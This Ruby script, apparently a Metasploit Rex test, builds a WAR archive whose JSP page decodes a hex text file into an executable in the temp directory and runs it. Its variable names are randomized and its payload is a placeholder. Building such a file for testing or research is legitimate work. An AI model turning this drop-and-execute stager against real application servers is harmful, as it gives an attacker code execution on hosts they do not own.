#!/usr/bin/env ruby # -*- coding: binary -*- # # Create a WAR archive! # msfbase = __FILE__ while File.symlink?(msfbase) msfbase = File.expand_path(File.readlink(msfbase), File.dirname(msfbase)) end inc = File.dirname(msfbase) + '/../../..' $:.unshift(inc) require 'rex/zip' def rand_text_alpha(len) buff = "" foo = [] foo += ('A' .. 'Z').to_a foo += ('a' .. 'z').to_a # Generate a buffer from the remaining bytes if foo.length >= 256 len.times { buff << Kernel.rand(256) } else len.times { buff << foo[ rand(foo.length) ] } end return buff end exe = "exe " * 1024 var_payload = "var_payload" var_name = "var_name" zip = Rex::Zip::Archive.new # begin meta-inf/ minf = [ 0xcafe, 0x0003 ].pack('Vv') zip.add_file('META-INF/', nil, minf) # end meta-inf/ # begin meta-inf/manifest.mf mfraw = "Manifest-Version: 1.0\r\nCreated-By: 1.6.0_17 (Sun Microsystems Inc.)\r\n\r\n" zip.add_file('META-INF/MANIFEST.MF', mfraw) # end meta-inf/manifest.mf # begin web-inf/ zip.add_file('WEB-INF/', '') # end web-inf/ # begin web-inf/web.xml webxmlraw = %q{ NAME /PAYLOAD.jsp } webxmlraw.gsub!(/NAME/, var_name) webxmlraw.gsub!(/PAYLOAD/, var_payload) zip.add_file('WEB-INF/web.xml', webxmlraw) # end web-inf/web.xml # begin .jsp var_hexpath = rand_text_alpha(rand(8)+8) var_exepath = rand_text_alpha(rand(8)+8) var_data = rand_text_alpha(rand(8)+8) var_inputstream = rand_text_alpha(rand(8)+8) var_outputstream = rand_text_alpha(rand(8)+8) var_numbytes = rand_text_alpha(rand(8)+8) var_bytearray = rand_text_alpha(rand(8)+8) var_bytes = rand_text_alpha(rand(8)+8) var_counter = rand_text_alpha(rand(8)+8) var_char1 = rand_text_alpha(rand(8)+8) var_char2 = rand_text_alpha(rand(8)+8) var_comb = rand_text_alpha(rand(8)+8) var_exe = rand_text_alpha(rand(8)+8) var_hexfile = rand_text_alpha(rand(8)+8) var_proc = rand_text_alpha(rand(8)+8) jspraw = "<%@ page import=\"java.io.*\" %>\n" jspraw << "<%\n" jspraw << "String #{var_hexpath} = application.getRealPath(\"/\") + \"#{var_hexfile}.txt\";\n" jspraw << "String #{var_exepath} = System.getProperty(\"java.io.tmpdir\") + \"/#{var_exe}\";\n" jspraw << "String #{var_data} = \"\";\n" jspraw << "if (System.getProperty(\"os.name\").toLowerCase().indexOf(\"windows\") != -1){\n" jspraw << "#{var_exepath} = #{var_exepath}.concat(\".exe\");\n" jspraw << "}\n" jspraw << "FileInputStream #{var_inputstream} = new FileInputStream(#{var_hexpath});\n" jspraw << "FileOutputStream #{var_outputstream} = new FileOutputStream(#{var_exepath});\n" jspraw << "int #{var_numbytes} = #{var_inputstream}.available();\n" jspraw << "byte #{var_bytearray}[] = new byte[#{var_numbytes}];\n" jspraw << "#{var_inputstream}.read(#{var_bytearray});\n" jspraw << "#{var_inputstream}.close();\n" jspraw << "byte[] #{var_bytes} = new byte[#{var_numbytes}/2];\n" jspraw << "for (int #{var_counter} = 0; #{var_counter} < #{var_numbytes}; #{var_counter} += 2)\n" jspraw << "{\n" jspraw << "char #{var_char1} = (char) #{var_bytearray}[#{var_counter}];\n" jspraw << "char #{var_char2} = (char) #{var_bytearray}[#{var_counter} + 1];\n" jspraw << "int #{var_comb} = Character.digit(#{var_char1}, 16) & 0xff;\n" jspraw << "#{var_comb} <<= 4;\n" jspraw << "#{var_comb} += Character.digit(#{var_char2}, 16) & 0xff;\n" jspraw << "#{var_bytes}[#{var_counter}/2] = (byte)#{var_comb};\n" jspraw << "}\n" jspraw << "#{var_outputstream}.write(#{var_bytes});\n" jspraw << "#{var_outputstream}.close();\n" jspraw << "Process #{var_proc} = Runtime.getRuntime().exec(#{var_exepath});\n" jspraw << "%>\n" zip.add_file("#{var_payload}.jsp", jspraw) # end .jsp # begin .txt payloadraw = exe.unpack('H*')[0] zip.add_file("#{var_hexfile}.txt", payloadraw) # end .txt zip.save_to("test.war")